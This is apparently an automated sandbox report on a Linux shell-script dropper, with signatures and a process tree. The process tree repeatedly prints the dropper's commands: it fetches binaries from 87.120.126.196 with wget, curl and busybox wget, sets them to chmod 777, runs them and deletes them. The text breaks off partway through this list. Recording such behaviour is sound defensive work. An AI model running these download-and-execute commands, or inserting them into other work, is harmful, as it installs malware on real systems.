Malware Analysis Report

2025-05-06 04:16

Sample ID 241025-bp8xts1bje
Target 2a4992a461a9294243239f72f8e4f14f24cf6cad4805da41b24d2d4f92bff583.sh
SHA256 2a4992a461a9294243239f72f8e4f14f24cf6cad4805da41b24d2d4f92bff583
Tags
defense_evasion antivm discovery
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

2a4992a461a9294243239f72f8e4f14f24cf6cad4805da41b24d2d4f92bff583

Threat Level: Shows suspicious behavior

The file 2a4992a461a9294243239f72f8e4f14f24cf6cad4805da41b24d2d4f92bff583.sh was found to be: Shows suspicious behavior.

Malicious Activity Summary

defense_evasion antivm discovery

File and Directory Permissions Modification

Executes dropped EXE

Checks CPU configuration

Writes file to tmp directory

Reads runtime system information

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-25 01:20

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-25 01:20

Reported

2024-10-25 01:22

Platform

ubuntu1804-amd64-20240729-en

Max time kernel

8s

Max time network

128s

Command Line

[/tmp/2a4992a461a9294243239f72f8e4f14f24cf6cad4805da41b24d2d4f92bff583.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ /tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ N/A
N/A /tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z /tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z N/A
N/A /tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI /tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI N/A
N/A /tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0 /tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0 N/A
N/A /tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf /tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf N/A
N/A /tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk /tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk N/A
N/A /tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh /tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh N/A
N/A /tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC /tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC N/A
N/A /tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR /tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR N/A
N/A /tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx /tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx N/A
N/A /tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu /tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu N/A
N/A /tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY /tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY N/A
N/A /tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 /tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 N/A
N/A /tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR /tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR N/A
N/A /tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu /tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu N/A
N/A /tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY /tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY N/A
N/A /tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 /tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 N/A
N/A /tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR /tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR N/A
N/A /tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ /tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ N/A
N/A /tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z /tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z N/A
N/A /tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI /tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI N/A
N/A /tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0 /tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0 N/A
N/A /tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf /tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf N/A
N/A /tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk /tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk N/A
N/A /tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh /tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh N/A
N/A /tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC /tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC N/A
N/A /tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR /tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR N/A
N/A /tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx /tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ /usr/bin/curl N/A
File opened for modification /tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf /usr/bin/curl N/A
File opened for modification /tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh /usr/bin/curl N/A
File opened for modification /tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu /usr/bin/curl N/A
File opened for modification /tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI /usr/bin/curl N/A
File opened for modification /tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC /usr/bin/curl N/A
File opened for modification /tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx /usr/bin/curl N/A
File opened for modification /tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 /usr/bin/curl N/A
File opened for modification /tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR /usr/bin/curl N/A
File opened for modification /tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0 /usr/bin/curl N/A
File opened for modification /tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z /usr/bin/curl N/A
File opened for modification /tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR /usr/bin/curl N/A
File opened for modification /tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx /usr/bin/curl N/A
File opened for modification /tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ /usr/bin/curl N/A
File opened for modification /tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0 /usr/bin/curl N/A
File opened for modification /tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR /usr/bin/curl N/A
File opened for modification /tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu /usr/bin/curl N/A
File opened for modification /tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI /usr/bin/curl N/A
File opened for modification /tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk /usr/bin/curl N/A
File opened for modification /tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf /usr/bin/curl N/A
File opened for modification /tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC /usr/bin/curl N/A
File opened for modification /tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 /usr/bin/curl N/A
File opened for modification /tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR /usr/bin/curl N/A
File opened for modification /tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY /usr/bin/curl N/A
File opened for modification /tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z /usr/bin/curl N/A
File opened for modification /tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk /usr/bin/curl N/A
File opened for modification /tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh /usr/bin/curl N/A
File opened for modification /tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY /usr/bin/curl N/A

Processes

/tmp/2a4992a461a9294243239f72f8e4f14f24cf6cad4805da41b24d2d4f92bff583.sh

[/tmp/2a4992a461a9294243239f72f8e4f14f24cf6cad4805da41b24d2d4f92bff583.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.126.196/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]

/bin/chmod

[chmod 777 wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]

/tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ

[./wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]

/bin/rm

[rm wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]

/usr/bin/wget

[wget http://87.120.126.196/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]

/bin/chmod

[chmod 777 pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]

/tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z

[./pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]

/bin/rm

[rm pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]

/usr/bin/wget

[wget http://87.120.126.196/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]

/bin/chmod

[chmod 777 VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]

/tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI

[./VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]

/bin/rm

[rm VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]

/usr/bin/wget

[wget http://87.120.126.196/bins/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0]

/bin/chmod

[chmod 777 ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0]

/tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0

[./ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0]

/bin/rm

[rm ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0]

/usr/bin/wget

[wget http://87.120.126.196/bins/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf]

/bin/chmod

[chmod 777 bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf]

/tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf

[./bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf]

/bin/rm

[rm bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf]

/usr/bin/wget

[wget http://87.120.126.196/bins/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk]

/bin/chmod

[chmod 777 TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk]

/tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk

[./TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk]

/bin/rm

[rm TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk]

/usr/bin/wget

[wget http://87.120.126.196/bins/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh]

/bin/chmod

[chmod 777 KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh]

/tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh

[./KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh]

/bin/rm

[rm KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh]

/usr/bin/wget

[wget http://87.120.126.196/bins/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC]

/bin/chmod

[chmod 777 zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC]

/tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC

[./zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC]

/bin/rm

[rm zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC]

/usr/bin/wget

[wget http://87.120.126.196/bins/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR]

/bin/chmod

[chmod 777 Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR]

/tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR

[./Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR]

/bin/rm

[rm Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR]

/usr/bin/wget

[wget http://87.120.126.196/bins/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx]

/bin/chmod

[chmod 777 9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx]

/tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx

[./9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx]

/bin/rm

[rm 9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx]

/usr/bin/wget

[wget http://87.120.126.196/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]

/bin/chmod

[chmod 777 8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]

/tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu

[./8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]

/bin/rm

[rm 8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]

/usr/bin/wget

[wget http://87.120.126.196/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]

/bin/chmod

[chmod 777 cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]

/tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY

[./cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]

/bin/rm

[rm cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]

/usr/bin/wget

[wget http://87.120.126.196/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]

/bin/chmod

[chmod 777 4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]

/tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959

[./4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]

/bin/rm

[rm 4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]

/usr/bin/wget

[wget http://87.120.126.196/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]

/bin/chmod

[chmod 777 res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]

/tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR

[./res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]

/bin/rm

[rm res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]

/usr/bin/wget

[wget http://87.120.126.196/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]

/bin/chmod

[chmod 777 8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]

/tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu

[./8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]

/bin/rm

[rm 8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]

/usr/bin/wget

[wget http://87.120.126.196/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]

/bin/chmod

[chmod 777 cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]

/tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY

[./cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]

/bin/rm

[rm cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]

/usr/bin/wget

[wget http://87.120.126.196/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]

/bin/chmod

[chmod 777 4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]

/tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959

[./4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]

/bin/rm

[rm 4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]

/usr/bin/wget

[wget http://87.120.126.196/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]

/bin/chmod

[chmod 777 res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]

/tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR

[./res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]

/bin/rm

[rm res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]

/usr/bin/wget

[wget http://87.120.126.196/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]

/bin/chmod

[chmod 777 wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]

/tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ

[./wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]

/bin/rm

[rm wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]

/usr/bin/wget

[wget http://87.120.126.196/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]

/bin/chmod

[chmod 777 pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]

/tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z

[./pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]

/bin/rm

[rm pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]

/usr/bin/wget

[wget http://87.120.126.196/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]

/bin/chmod

[chmod 777 VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]

/tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI

[./VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]

/bin/rm

[rm VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]

/usr/bin/wget

[wget http://87.120.126.196/bins/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0]

/bin/chmod

[chmod 777 ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0]

/tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0

[./ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0]

/bin/rm

[rm ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0]

/usr/bin/wget

[wget http://87.120.126.196/bins/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf]

/bin/chmod

[chmod 777 bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf]

/tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf

[./bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf]

/bin/rm

[rm bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf]

/usr/bin/wget

[wget http://87.120.126.196/bins/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk]

/bin/chmod

[chmod 777 TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk]

/tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk

[./TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk]

/bin/rm

[rm TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk]

/usr/bin/wget

[wget http://87.120.126.196/bins/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh]

/bin/chmod

[chmod 777 KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh]

/tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh

[./KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh]

/bin/rm

[rm KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh]

/usr/bin/wget

[wget http://87.120.126.196/bins/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC]

/bin/chmod

[chmod 777 zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC]

/tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC

[./zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC]

/bin/rm

[rm zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC]

/usr/bin/wget

[wget http://87.120.126.196/bins/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR]

/bin/chmod

[chmod 777 Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR]

/tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR

[./Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR]

/bin/rm

[rm Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR]

/usr/bin/wget

[wget http://87.120.126.196/bins/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx]

